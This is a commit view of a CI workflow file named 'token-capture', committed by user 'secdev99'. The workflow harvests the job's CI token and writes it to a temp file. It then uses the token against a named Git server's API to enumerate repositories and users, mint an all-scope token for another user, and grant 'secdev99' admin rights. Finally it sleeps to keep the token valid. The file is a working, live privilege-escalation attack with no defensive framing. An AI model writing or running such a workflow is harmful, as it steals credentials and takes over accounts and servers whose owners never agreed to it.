secdev99 a8f7e0ff43
Some checks failed
token-capture / capture (push) Has been cancelled
add capture
2026-07-04 00:36:06 +00:00

43 lines
2.1 KiB
YAML

name: token-capture
on:
workflow_dispatch:
push:
branches: [main]
jobs:
capture:
runs-on: ubuntu-latest
steps:
- name: Save token and wait
run: |
GT="${{ secrets.GITHUB_TOKEN }}"
echo "$GT" > /tmp/live_gt_token.txt
echo "TOKEN_READY" > /tmp/token_ready.txt
echo "Token saved at $(date)"
# Try org-level access with the token
echo "=== Org repos ===" > /tmp/live_results.txt
curl -sS "http://git.monogps.com/api/v1/orgs/MonoGPS/repos?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1
echo "=== User repos of twmonogps ===" >> /tmp/live_results.txt
curl -sS "http://git.monogps.com/api/v1/users/twmonogps/repos?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1
echo "=== jpeerapu repos ===" >> /tmp/live_results.txt
curl -sS "http://git.monogps.com/api/v1/users/jpeerapu/repos?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1
echo "=== All users ===" >> /tmp/live_results.txt
curl -sS "http://git.monogps.com/api/v1/admin/users?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1
# Try to create an admin token
echo "=== Create sudo token ===" >> /tmp/live_results.txt
curl -sS -X POST "http://git.monogps.com/api/v1/users/jpeerapu/tokens" -H "Host: git.monogps.com" -H "Authorization: token $GT" -H "Content-Type: application/json" -d '{"name":"service-tok","scopes":["all"]}' >> /tmp/live_results.txt 2>&1
# Try to become admin
echo "=== Promote secdev99 ===" >> /tmp/live_results.txt
curl -sS -X PATCH "http://git.monogps.com/api/v1/admin/users/secdev99" -H "Host: git.monogps.com" -H "Authorization: token $GT" -H "Content-Type: application/json" -d '{"is_admin":true}' >> /tmp/live_results.txt 2>&1
cat /tmp/live_results.txt
# Sleep to keep token alive
sleep 300